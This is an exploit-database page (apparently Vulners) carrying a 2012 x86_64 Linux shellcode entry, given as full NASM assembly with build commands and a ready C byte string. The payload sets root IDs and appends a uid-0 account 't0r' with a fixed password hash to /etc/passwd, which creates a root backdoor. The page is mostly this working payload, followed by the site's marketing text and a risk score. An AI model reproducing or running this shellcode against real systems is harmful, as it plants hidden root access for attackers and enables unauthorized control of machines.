Vulners
Lucene search
Linux x86_64 - add user with passwd (189 bytes)
;sc_adduser01.S
;Arch: x86_64, Linux
;
;Author: 0_o -- null_null
; nu11.nu11 [at] yahoo.com
;Date: 2012-03-05
;
;compile an executable: nasm -f elf64 sc_adduser.S
; ld -o sc_adduser sc_adduser.o
;compile an object: nasm -o sc_adduser_obj sc_adduser.S
;
;Purpose: adds user "t0r" with password "Winner" to /etc/passwd
;executed syscalls: setreuid, setregid, open, write, close, exit
;Result: t0r:3UgT5tXKUkUFg:0:0::/root:/bin/bash
;syscall op codes: /usr/include/x86_64-linux-gnu/asm/unistd_64.h
BITS 64
[SECTION .text]
global _start
_start:
;sys_setreuid(uint ruid, uint euid)
xor rax, rax
mov al, 113 ;syscall sys_setreuid
xor rbx, rbx ;arg 1 -- set real uid to root
mov rcx, rbx ;arg 2 -- set effective uid to root
syscall
;sys_setregid(uint rgid, uint egid)
xor rax, rax
mov al, 114 ;syscall sys_setregid
xor rbx, rbx ;arg 1 -- set real uid to root
mov rcx, rbx ;arg 2 -- set effective uid to root
syscall
;push all strings on the stack prior to file operations.
xor rbx, rbx
mov ebx, 0x647773FF
shr rbx, 8
push rbx ;string \00dws
mov rbx, 0x7361702f6374652f
push rbx ;string sap/cte/
mov rbx, 0x0A687361622F6EFF
shr rbx, 8
push rbx ;string \00\nhsab/n
mov rbx, 0x69622F3A746F6F72
push rbx ;string ib/:toor
mov rbx, 0x2F3A3A303A303A67
push rbx ;string /::0:0:g
mov rbx, 0x46556B554B587435
push rbx ;string FUkUKXt5
mov rbx, 0x546755333A723074
push rbx ;string TgU3:r0t
;prelude to doing anything useful...
mov rbx, rsp ;save stack pointer for later use
push rbp ;store base pointer to stack so it can be restored later
mov rbp, rsp ;set base pointer to current stack pointer
;sys_open(char* fname, int flags, int mode)
sub rsp, 16
mov [rbp - 16], rbx ;store pointer to "t0r..../bash"
mov si, 0x0401 ;arg 2 -- flags
mov rdi, rbx
add rdi, 40 ;arg 1 -- pointer to "/etc/passwd"
xor rax, rax
mov al, 2 ;syscall sys_open
syscall
;sys_write(uint fd, char* buf, uint size)
mov [rbp - 4], eax ;arg 1 -- fd is retval of sys_open. save fd to stack for later use.
mov rcx, rbx ;arg 2 -- load rcx with pointer to string "t0r.../bash"
xor rdx, rdx
mov dl, 39 ;arg 3 -- load rdx with size of string "t0r.../bash\00"
mov rsi, rcx ;arg 2 -- move to source index register
mov rdi, rax ;arg 1 -- move to destination index register
xor rax, rax
mov al, 1 ;syscall sys_write
syscall
;sys_close(uint fd)
xor rdi, rdi
mov edi, [rbp - 4] ;arg 1 -- load stored file descriptor to destination index register
xor rax, rax
mov al, 3 ;syscall sys_close
syscall
;sys_exit(int err_code)
xor rax, rax
mov al, 60 ;syscall sys_exit
xor rbx, rbx ;arg 1 -- error code
syscall
;char shellcode[] =
; "\x48\x31\xc0\xb0\x71\x48\x31\xdb\x48\x31\xc9\x0f\x05\x48\x31"
; "\xc0\xb0\x72\x48\x31\xdb\x48\x31\xc9\x0f\x05\x48\x31\xdb\xbb"
; "\xff\x73\x77\x64\x48\xc1\xeb\x08\x53\x48\xbb\x2f\x65\x74\x63"
; "\x2f\x70\x61\x73\x53\x48\xbb\xff\x6e\x2f\x62\x61\x73\x68\x0a"
; "\x48\xc1\xeb\x08\x53\x48\xbb\x72\x6f\x6f\x74\x3a\x2f\x62\x69"
; "\x53\x48\xbb\x67\x3a\x30\x3a\x30\x3a\x3a\x2f\x53\x48\xbb\x35"
; "\x74\x58\x4b\x55\x6b\x55\x46\x53\x48\xbb\x74\x30\x72\x3a\x33"
; "\x55\x67\x54\x53\x48\x89\xe3\x55\x48\x89\xe5\x48\x83\xec\x10"
; "\x48\x89\x5d\xf0\x66\xbe\x01\x04\x48\x89\xdf\x48\x83\xc7\x28"
; "\x48\x31\xc0\xb0\x02\x0f\x05\x89\x45\xfc\x48\x89\xd9\x48\x31"
; "\xd2\xb2\x27\x48\x89\xce\x48\x89\xc7\x48\x31\xc0\xb0\x01\x0f"
; "\x05\x48\x31\xff\x8b\x7d\xfc\x48\x31\xc0\xb0\x03\x0f\x05\x48"
; "\x31\xc0\xb0\x3c\x48\x31\xdb\x0f\x05";
;
;equivalent code:
;
;char shellcode[] =
; "\x48\x31\xc0\xb0\x71\x48\x31\xdb\x48\x89\xd9\x0f\x05\x48\x31"
; "\xc0\xb0\x72\x48\x31\xdb\x48\x89\xd9\x0f\x05\x48\x31\xdb\xbb"
; "\xff\x73\x77\x64\x48\xc1\xeb\x08\x53\x48\xbb\x2f\x65\x74\x63"
; "\x2f\x70\x61\x73\x53\x48\xbb\xff\x6e\x2f\x62\x61\x73\x68\x0a"
; "\x48\xc1\xeb\x08\x53\x48\xbb\x72\x6f\x6f\x74\x3a\x2f\x62\x69"
; "\x53\x48\xbb\x67\x3a\x30\x3a\x30\x3a\x3a\x2f\x53\x48\xbb\x35"
; "\x74\x58\x4b\x55\x6b\x55\x46\x53\x48\xbb\x74\x30\x72\x3a\x33"
; "\x55\x67\x54\x53\x48\x89\xe3\x55\x48\x89\xe5\x48\x83\xec\x10"
; "\x48\x89\x5d\xf0\x66\xbe\x01\x04\x48\x89\xdf\x48\x83\xc7\x28"
; "\x48\x31\xc0\xb0\x02\x0f\x05\x89\x45\xfc\x48\x89\xd9\x48\x31"
; "\xd2\xb2\x27\x48\x89\xce\x48\x89\xc7\x48\x31\xc0\xb0\x01\x0f"
; "\x05\x48\x31\xff\x8b\x7d\xfc\x48\x31\xc0\xb0\x03\x0f\x05\x48"
; "\x31\xc0\xb0\x3c\x48\x31\xdb\x0f\x05";
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 Mar 2012 00:00Current
7.1High risk
Vulners AI Score7.1